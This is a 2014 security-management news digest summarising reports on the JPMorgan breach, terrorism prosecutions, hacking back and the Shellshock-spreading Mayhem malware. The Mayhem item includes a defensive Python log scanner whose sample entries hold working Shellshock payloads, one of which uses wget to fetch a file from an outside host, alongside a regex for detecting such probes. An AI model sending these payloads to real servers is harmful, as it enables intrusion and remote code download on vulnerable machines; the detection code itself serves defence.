
Friday, October 10, 2014

Security Management Weekly - October 10, 2014


October 10, 2014
 
 
Corporate Security
  1. "JPMorgan Hackers Said to Probe 13 Financial Firms"
  2. "ASIS, SIA Launch Joint Learning Management System"
  3. "Identity Thieves Targeted Saks Customers, DA Says"
  4. "In Search of Security Metrics"
  5. "Managing Supply Chain Risk"

Homeland Security
  1. "Obama Weighs Options to Close Guantanamo"
  2. "U.S. Steps Up Fight to Block ISIS Volunteers"
  3. "Khorasan Terrorists Will Attack U.S. 'Very, Very Soon,' FBI Director Warns"
  4. "Four Arrested in London in Plot to Behead People on City Streets"
  5. "Chicago-Area Man Charged in Attempt to Join Islamic State in Syria"

Cyber Security
  1. "Cyberattacks Trigger Talk of 'Hacking Back'"
  2. "Malware 'Mayhem' Follows Emergence of Shellshock Vulnerability"
  3. "U.S. Cyber Command Plans to Recruit 6,000 Cyber Professionals, as U.S. Mulls Offensive Cyber Strategy"
  4. "DHS' Ozment Seeks the Best Metrics for New Cyber Scorecard"
  5. "How Does the Cloud Change Cybersecurity?"

JPMorgan Hackers Said to Probe 13 Financial Firms
Bloomberg (10/09/14) Riley, Michael; Robertson, Jordan

Evidence has emerged that the hackers behind the major breach of JPMorgan Chase's systems, which exposed data from tens of millions of accounts, also attempted to breach other major financial firms. At least 13 more firms have been identified as targets, including Citigroup, HSBC Holdings, E*Trade, and the payroll firm Automatic Data Processing (ADP). Some of these attempts appear to have failed, but they show that the hackers were active for a long time; E*Trade in particular was targeted as long ago as last year. This highlights that the financial sector, often recognized as a leader in cybersecurity information sharing, is still hamstrung by companies' reluctance to reveal that they have been hacked. John Pescatore of the SANS Institute says that one of the best ways to combat such campaigns is information sharing, which allows companies and agencies to coordinate a response. But it was only after the JPMorgan breach was revealed that the Financial Services Information Sharing and Analysis Center (FS-ISAC) began circulating details of the attack, such as the attackers' Internet Protocol (IP) addresses, to other companies. The failure of other victims to report their own breaches earlier may have allowed the hackers to continue their campaign, culminating in the JPMorgan breach.


ASIS, SIA Launch Joint Learning Management System
Security Director News (10/06/14)

ASIS International and the Security Industry Association (SIA) have created my Global Portal for Security (myGPS), a learning tool and information source for security industry professionals. myGPS provides a number of classroom and online training options for security professionals who want to improve their knowledge and performance. ASIS and SIA say the program will eventually include career tracking and management of ASIS and SIA certification. Both organizations will also offer new courses, learning materials, and career planning to support security industry insiders. "All security professionals will find value in the educational opportunities available through the myGPS learning management system, particularly those seeking to deepen their knowledge of security project management and perhaps start down the road of becoming a Certified Security Project Manager," says SIA Chairman John Stroia.


Identity Thieves Targeted Saks Customers, DA Says
Wall Street Journal (10/06/14) Morales, Mark

Five people, including employees of Saks Fifth Avenue's store in Manhattan, have been indicted on charges that they used information stolen from store customers to buy more than $400,000 worth of designer shoes and accessories. According to Manhattan District Attorney Cyrus Vance, the identity-theft ring allegedly operated between April and August, buying luxury goods that could be resold on the black market. Saks' operating company, Hudson's Bay Company, said the thefts affected 22 customers, all of whom have been notified and have had their accounts restored. But Vance said companies need to do more to protect their customers from such crimes. "These institutions, in trying to do a good job servicing their customers, need to have protocols in place so that they can assess whether or not their internal compliance and security is up to snuff," he said.


In Search of Security Metrics
Security Management (10/14) Ohlhausen, Peter E.

Metrics are increasingly being used by security professionals. A metric is a measurement gathered consistently over time that ultimately shapes decision making. A metrics-based approach to security gives personnel the ability to determine what works, demonstrate the value of security measures, and align security goals. To help security professionals use metrics more effectively, the ASIS Foundation financed the ASIS Foundation Metrics Research Project, which set out to develop tools for discovering, developing, assessing, improving, and presenting security metrics. To understand how metrics were being used in the security industry, the researchers polled 3,000 ASIS members. The survey found that 78 percent would use metrics if they knew how to create and use them, and more than 50 percent asked ASIS for more information on metrics. In response, Global Skills X-Change and Ohlhausen Research created the Security Metrics Evaluation Tool (Security MET), which helps security personnel assess a metric against nine criteria grouped as technical, operational, and strategic. The researchers also compiled summaries of metrics currently in use and guidelines for presenting them to senior management.


Managing Supply Chain Risk
Security Technology Executive (10/14) Vol. 24, No. 4, P. 22 Passmore, Marty

Theft is an ever bigger threat to the security of companies' supply chains. Thieves target freight carrying a wide variety of goods worth hundreds of millions of dollars. The risk is harder to address because industry regulations do not permit a single sweeping approach to security. However, programs such as the Customs-Trade Partnership Against Terrorism (C-TPAT), Partners in Protection (PIP), and the EU Authorized Economic Operator (AEO) are working to bolster supply chain security across the globe. Security experts note that one of the highest risks involves keeping products safe while they are stored in warehouses; these are also the easiest risks to mitigate, with cages, trailer seals, and other physical security measures. Products are also at risk from cargo theft gangs while in transit. To stay ahead of thieves, companies have implemented covert and overt GPS tracking of expensive shipments. Tracking can be active, with security staff following the shipment's every movement, or passive, with alerts sent to monitoring stations if a shipment deviates from set thresholds or fails to arrive at checkpoints on time. Physical escorts can also accompany a shipment to its destination; that method is costly, but has proven to be the most effective.




Obama Weighs Options to Close Guantanamo
Wall Street Journal (10/09/14) Lee, Carol E.; Bravin, Jess

Senior Obama administration officials report that two options are under consideration that would allow the president to close the detention facility at Guantanamo Bay by overriding the congressional ban on bringing detainees to the U.S. One of those options involves forcing a showdown with Congress on the issue by vetoing the annual military policy bill to which the ban is attached. Alternatively, the president could sign the bill, but declare his intention to disregard the ban in a signing statement and then proceed to transfer prisoners and close the facility. However, the president reportedly prefers that Congress pass legislation that would close Gitmo, although he is also determined to close the facility and is said to be willing to consider all potential options for accomplishing that goal. A major part of the effort to close Guantanamo is arranging the release and repatriation of several detainees. More than half of the 149 men still held at the facility have been approved for release or transfer, but are still being held as the government works to craft deals to have them transferred to other nations or repatriated to their home countries. Should the administration move forward with one of those plans, the remaining prisoners would most likely be transferred to the military brig in Charleston, S.C., although other facilities are under consideration as well.


U.S. Steps Up Fight to Block ISIS Volunteers
New York Times (10/09/14) Schmidt, Michael S.

Federal authorities are increasingly tracking down, charging, and prosecuting Americans who are believed to be planning to travel to the Middle East to join terrorist groups like the Islamic State (IS). The Justice Department has charged 10 people who have made such travel plans so far this year, the most recent of which was Mohammed H. Khan, who was arrested at Chicago's O'Hare International Airport on Oct. 4 for allegedly planning to travel to Turkey to meet someone who promised to take him to join IS in either Syria or Iraq. Just five people were prosecuted for planning to travel overseas to join up with terrorist groups between 2011 and 2013. The effort to prevent Americans from going abroad to join terrorist organizations has been criticized by civil libertarians, who say it may actually be encouraging some radicalized individuals to make travel plans to join terrorist organizations by romanticizing jihad. Federal authorities deny that, and say the increased number of prosecutions of people traveling abroad for the purpose of joining a terrorist group is the result of heightened vigilance in identifying such individuals. The Justice Department also says it has no choice but to work to prevent Americans from making terrorism-related travel plans, as these individuals could receive training from terrorist groups that they could then use to carry out attacks against the American homeland.


Khorasan Terrorists Will Attack U.S. 'Very, Very Soon,' FBI Director Warns
Russia Today (Russia) (10/08/14)

FBI Director James Comey said in a recent "60 Minutes" interview that he believes the al-Qaida-linked Khorasan Group will launch an attack on the United States or its allies "very, very soon." Comey would not say more specifically when an attack would occur. He also pointed out that about "a dozen or so" American citizens are fighting in Syria for Islamic fundamentalist groups. The government says it knows their identities, and as American passport holders, they are free to reenter the United States. If they do reenter the country, Comey says the government will be tracking them carefully. A report by Associated Press said that Khorasan militants did not initially travel to Syria to fight against President Bashar Assad, but were under orders by al-Qaida leader Ayman al-Zawahiri to recruit Westerners with passports that allowed them to undergo less scrutiny from security officials when flying to the U.S.


Four Arrested in London in Plot to Behead People on City Streets
Homeland Security News Wire (10/08/14)

London police on Tuesday arrested four men who were allegedly involved in a terrorist plot to kidnap people on the streets of the British capital and behead them. One of the men is said to have links to Syria and the Islamic State (IS), a group which security analysts say may want to retaliate against Britain for its participation in airstrikes on IS targets in Iraq. According to one source, officers believe that the raids disrupted what might have become a "significant plot." The suspects had reportedly been under close surveillance for some time.


Chicago-Area Man Charged in Attempt to Join Islamic State in Syria
Reuters (10/07/14) Ortiz, Fiona

A Chicago-area man was in court Monday to face charges that he was attempting to provide support to the Islamic State (IS). Mohammed H. Khan was arrested at Chicago's O'Hare International Airport on Oct. 4 after he tried to board an Austrian Airlines flight to Istanbul. After his arrest, Khan admitted to federal agents that he planned to meet a contact in Turkey who would take him to territory controlled by IS. Khan said during his interview with federal agents that he planned to join the militant group "in some type of public service, a police force, humanitarian work, or a combat role." A search of Khan's home turned up notebooks in which he planned the trip and a note he left his family in which he exhorted them to follow his lead in joining IS. It is unclear how Khan initially came to the attention of authorities, although his travel plans may have been the source of their concerns. American officials, who are already closely monitoring young people flying from the U.S. to Turkey, may have become suspicious of Khan after he made plans to fly to Istanbul and stay there for two nights before returning home.




Cyberattacks Trigger Talk of 'Hacking Back'
Washington Post (10/10/14) Timberg, Craig; Nakashima, Ellen; Douglas-Gabriel, Danielle

The continuing attacks on U.S. corporate networks are fueling talk among some executives and officials of going on the offensive, or "hacking back," against those who hack their systems. The measures under discussion tend to be limited to tracking and/or destroying stolen data. One idea involves tagging sensitive data with a beacon so that, if stolen, it could be tracked, potentially located, and deleted before it is misused. The major problem is that any such efforts would, by their nature, be illegal. FBI investigators tacitly acknowledge that some companies, or their network administrators, occasionally engage in illegal hack-back activities, even though investigators will not say so officially. More than one in three security professionals polled at the Black Hat USA conference in 2012 said they had engaged in retaliatory hacking at least once. However, the potential liabilities are considerable, and for that reason it is unlikely that major companies would ever openly adopt hacking back as part of their security policies, according to Greg Garcia, executive director of the Financial Services Sector Coordinating Council.


Malware 'Mayhem' Follows Emergence of Shellshock Vulnerability
eWeek (10/08/14) Lemos, Robert

A malicious program called Mayhem has started spreading to Linux and Unix servers by exploiting the "Shellshock" vulnerability in Bash, the Unix command shell. The attack currently uses servers at 47 different Internet locations, including 18 in the United States, to scan for vulnerable hosts. It is still unknown how many servers have been infected via Shellshock, but a July analysis of the pre-Shellshock version of the malware found about 1,400 servers compromised by it. "This is a very serious threat, please work and cooperate together...to stop the source of the threat," says the anti-malware group Malware Must Die. Mayhem carries out its tasks on Linux and Unix servers without gaining full control of the host system, and its modular design lets the software be easily updated with new functionality. "Nowadays, there are millions of completely unprotected Web servers with different kinds of vulnerabilities, so it is easy for attackers to upload Web shells and gain access to them," say Yandex researchers.
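The scanning described above leaves a recognizable trace in web server logs, because Shellshock (CVE-2014-6271) is triggered by an environment variable whose value begins with a bash function definition, `() { ... };`, followed by the command to run, and CGI wrappers export request headers such as User-Agent and Referer into the environment. The following detector is an added example written for this page, not code from the original newsletter, from Yandex, or from Malware Must Die; it parses Apache/nginx combined-format lines, decodes URL-encoded payloads in the query string, and reports the source address and the command each probe tried to execute. The log lines, IP addresses (documentation ranges) and paths are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/nginx "combined" log format: ip ident user [time] "request" status size "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock (CVE-2014-6271) trigger: a value that begins with a bash function
# definition "() { ... }" and carries trailing text, which a vulnerable bash
# executed as a command when it imported the value from the environment.
# CGI wrappers export request headers as environment variables, which is why
# the payload shows up in the User-Agent, Referer or query string.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)')


@dataclass
class Hit:
    ip: str
    field: str      # which logged field carried the payload
    command: str    # the command the attacker tried to run


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def _candidate_text(rec: Dict[str, str], field: str) -> str:
    """Text to inspect for a given field; the request line is reduced to its path and query."""
    text = rec[field]
    if field == "request":
        parts = text.split(" ")
        if len(parts) == 3:          # "METHOD /path?query HTTP/x.y"
            text = parts[1]
    # Scanners sometimes URL-encode the payload in the query string; decoding is a
    # no-op for plain header values, so apply it uniformly.
    return unquote(text)


def find_shellshock(lines: List[str]) -> List[Hit]:
    """Scan log lines and return one Hit per field that carries a Shellshock payload."""
    hits: List[Hit] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue        # unparseable line: skip rather than abort the whole scan
        for field in ("request", "referer", "agent"):
            m = SHELLSHOCK_RE.search(_candidate_text(rec, field))
            if m:
                hits.append(Hit(ip=rec["ip"], field=field, command=m.group("cmd").strip()))
    return hits


def scanner_ips(hits: List[Hit]) -> List[str]:
    """Distinct source addresses, sorted, ready for blocking or for sharing with peers."""
    return sorted({h.ip for h in hits})


# Constructed sample log (not real traffic): documentation-range IPs and made-up paths.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Oct/2014:13:21:07 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" '
    '"() { :;}; /usr/bin/wget -O /tmp/x http://198.51.100.7/x"',
    '198.51.100.23 - - [08/Oct/2014:13:22:41 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.5 - - [08/Oct/2014:13:25:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 '
    '"() { test;};/usr/bin/id" "curl/7.38.0"',
    '192.0.2.9 - - [08/Oct/2014:13:30:19 +0000] '
    '"GET /cgi-bin/x.cgi?a=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fid HTTP/1.1" 500 0 "-" "Wget/1.15"',
]

if __name__ == "__main__":
    found = find_shellshock(SAMPLE_LOG)
    for hit in found:
        print(f"{hit.ip:<14} {hit.field:<8} {hit.command}")
    print("scanners:", ", ".join(scanner_ips(found)))
```

Run against a real access log one line at a time. Note that combined-format logs only preserve the request line, Referer and User-Agent; a probe that places the payload in another header (Cookie, Host, a custom header) is invisible here unless the server is configured to log that header as well, and a 404 or 500 status says nothing about whether the command ran.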


U.S. Cyber Command Plans to Recruit 6,000 Cyber Professionals, as U.S. Mulls Offensive Cyber Strategy
Homeland Security News Wire (10/06/14)

U.S. Cyber Command is planning to step up its efforts to protect the nation's networks from cyberattackers. U.S. Cyber Command Deputy Commander Lt. Gen. James McLaughlin announced Oct. 2 that his unit is planning to recruit 6,000 cybersecurity professionals and create 133 teams of military and civilian personnel who will help support the Pentagon's cyber defense efforts. The teams will operate across all branches of the military. That marks a reversal from the current situation, in which all of the military's branches perform cyber defense responsibilities independently of one another. But McLaughlin, who made the announcement at a cybersecurity event, said more needs to be done to protect the nation from cyberattacks. For instance, technology companies need to develop new security tools that can help guard against attacks, while colleges and universities need to promote their cybersecurity programs so the nation has enough cybersecurity professionals, McLaughlin said.


DHS' Ozment Seeks the Best Metrics for New Cyber Scorecard
Federal News Radio (10/03/14) Miller, Jason

This is the first year in which raising federal cybersecurity awareness is unnecessary, according to Andy Ozment, assistant secretary of the Department of Homeland Security's Office of Cybersecurity and Communications. "From all the breaches that have been in the news to what companies are seeing on their own networks and their understanding about the risks they have to manage, this is the year...that people recognize cybersecurity is important and cyberrisks are risks they have to manage," he says. Ozment's office plans to create a scorecard to measure each agency's progress in securing its systems. "I think we can have a scorecard or a dashboard that gives us reasonable confidence that we know how secure a department and agency is," Ozment says. The White House is also measuring agency cybersecurity as part of its cross-agency priority goals. In its most recent progress report, the White House reported that 64 percent of agencies are using strong smart card authentication to log onto their computers, 92 percent of agency Internet traffic passes through a Trusted Internet Connection (TIC) access point, and 91 percent of agencies have implemented the TIC capabilities. DHS is also focused on cyber information sharing, Ozment says, and a third DHS priority is to sustain implementation and adoption of the Cybersecurity Framework for protecting critical infrastructure that stemmed from President Obama's February 2013 executive order.


How Does the Cloud Change Cybersecurity?
Government Technology (10/03/14) Towns, Steve

Texas CISO Brian Engle says the use of cloud services and the emerging Internet of Things are changing how cybersecurity is practiced, but not necessarily as much as one might think. The central problem of the cloud, Engle says, is not that companies and agencies lose direct control over security when they move to cloud services, but that they often compound the problem by using multiple cloud providers, multiplying their uncertainty and risk exposure. The solution is to extend monitoring and response across vendors; the challenge is getting all of an organization's vendors to agree on how. Engle also says the risks of the Internet of Things are largely known risks, and the danger is that no one acts on them before they result in a major problem. To handle these risks, CIOs and CISOs need to be ready to communicate about them clearly and compellingly with executives, presenting facts and having answers.


Abstracts Copyright © 2014 Information, Inc. Bethesda, MD

